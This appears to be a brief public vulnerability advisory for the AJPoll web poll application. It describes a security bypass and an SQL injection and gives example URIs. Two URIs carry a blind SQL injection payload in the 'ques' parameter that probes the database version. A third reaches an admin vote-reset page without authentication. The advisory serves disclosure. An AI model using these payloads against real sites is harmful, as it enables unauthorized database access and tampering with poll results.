AJPoll Security Bypass and SQL Injection Vulnerabilities

AJPoll Security Bypass and SQL Injection Vulnerabilities

Attackers can exploit the issues via a browser.

The following example URIs are available:

http://www.example.com/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/*
http://www.example.com/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/*
http://www.example.com/admin/resetvote.php